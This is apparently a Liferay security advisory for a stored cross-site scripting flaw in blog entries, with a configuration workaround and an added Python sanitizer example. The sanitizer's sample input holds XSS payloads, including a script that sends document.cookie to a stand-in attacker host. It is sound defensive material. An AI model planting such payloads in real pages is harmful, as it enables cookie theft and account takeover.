CVE-2024-25610 Stored XSS with Blog entries (Insecure defaults)

Description

In Liferay Portal and Liferay DXP, the default configuration does not sanitize blog entries of JavaScript, which allows remote authenticated users who can create or edit blog entries to inject arbitrary web script or HTML (stored XSS) via a crafted payload in a blog entry's content text field. Because the payload is persisted with the entry, it executes in the browser of every user who views it.

Severity

9.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)

Affected Version(s)

  • Liferay Portal 7.4.0 through 7.4.3.12
  • Liferay Portal 7.3.0 through 7.3.7
  • Liferay Portal 7.2.0 and 7.2.1
  • Liferay Portal, older unsupported versions
  • Liferay DXP 7.4 before update 9
  • Liferay DXP 7.3 before update 4
  • Liferay DXP 7.2 before fix pack 19
  • Liferay DXP, older unsupported versions

Fixed Version(s)

Notes

Workaround:
In the AntiSamy Sanitizer configuration, the Whitelist lists model classes whose content is exempt from sanitization. com.liferay.blogs.model.BlogsEntry is on that list by default, which is the insecure default this advisory describes; removing it makes blog entry content pass through the AntiSamy sanitizer.
Navigate to: System Settings > Security Tools > AntiSamy Sanitizer
and remove com.liferay.blogs.model.BlogsEntry from the Whitelist
Sanitization is applied when an entry is saved, so entries stored before the change are not cleaned retroactively and should be reviewed for injected script.
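To make concrete what "sanitizing a blog entry of JavaScript" has to remove once BlogsEntry is no longer exempt, the following is an added example and not Liferay's code or its AntiSamy configuration: a small allowlist HTML sanitizer in Python's standard library, applied to a constructed blog body carrying the usual stored-XSS vectors (a script element, an event-handler attribute, and an entity-encoded javascript: URL). The tag and attribute allowlists, the sample body and the attacker.example host are assumptions for the illustration.

```python
"""Allowlist HTML sanitizer: an added illustration, not Liferay's AntiSamy.

Keeps rich-text markup a blog body needs and drops script elements with
their contents, event-handler attributes, and URL attributes whose scheme
is not allowlisted. Unknown tags are dropped but their text is kept.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlists for the example; anything not listed is dropped.
ALLOWED_TAGS = {
    "p", "br", "b", "i", "em", "strong", "u", "h1", "h2", "h3",
    "ul", "ol", "li", "blockquote", "code", "pre", "a", "img",
}
# on* handlers and style are never listed, so they never survive.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
# Empty scheme = relative URL. javascript: and data: are deliberately absent.
SAFE_SCHEMES = {"", "http", "https", "mailto"}
# Elements whose content is discarded too, not just the tag itself.
DROP_CONTENT_TAGS = {"script", "style"}
VOID_TAGS = {"br", "img"}
_CTRL_WS = re.compile(r"[\x00-\x20\x7f]")


def safe_url(value: str) -> bool:
    """True if the URL's scheme is allowlisted. Whitespace and control
    characters are stripped before parsing so "java\\tscript:" cannot
    smuggle a scheme past the check; the original value is what gets emitted."""
    cleaned = _CTRL_WS.sub("", value)
    return urlparse(cleaned).scheme.lower() in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    """Re-serialises the input keeping only allowlisted markup."""

    def __init__(self):
        # convert_charrefs=True: text and attribute values arrive decoded,
        # so "&#106;avascript:" is already "javascript:" when checked.
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # allowlisted tags currently open
        self.drop_depth = 0   # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            value = value or ""
            if name in URL_ATTRS and not safe_url(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    # <br/> and <script/> go through the default handle_startendtag,
    # which calls handle_starttag and then handle_endtag.
    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.drop_depth = max(0, self.drop_depth - 1)
            return
        if self.drop_depth or tag not in self.open_tags:
            return
        # Also close anything opened after `tag`, so output stays well nested.
        while self.open_tags:
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments never reach the output

    def result(self) -> str:
        self.close()
        while self.open_tags:  # close anything the author left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize(untrusted_html: str) -> str:
    parser = Sanitizer()
    parser.feed(untrusted_html)
    return parser.result()


# Constructed sample: a blog body as a malicious author might submit it.
SAMPLE_BLOG_BODY = (
    "<h2>Release notes</h2>"
    '<p onmouseover="alert(document.cookie)">See the '
    '<a href="https://example.com/notes" title="notes">notes</a>.</p>'
    '<script>fetch("https://attacker.example/c?" + document.cookie)</script>'
    '<img src="x" onerror="alert(1)">'
    '<a href="&#106;avascript:alert(1)">old link</a>'
)

if __name__ == "__main__":
    print(sanitize(SAMPLE_BLOG_BODY))
```

Run stand-alone, the script prints the body with the heading, paragraph, link and image intact and with the script element, the onmouseover and onerror handlers and the javascript: href removed. The point of the example is the shape of the filter (allowlist, not blocklist; content of script dropped, not just the tag; URL schemes checked after decoding and whitespace stripping); in a Liferay deployment the shipped AntiSamy sanitizer does this work once blog entries are no longer exempt, and a hand-written filter like this one should not replace it.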

Publication date: Tue, 20 Feb 2024 12:30:00 +0000

Security advisories for Liferay's enterprise offerings (e.g., Liferay DXP) are only listed here since 2023. Historical advisories are available in the Help Center.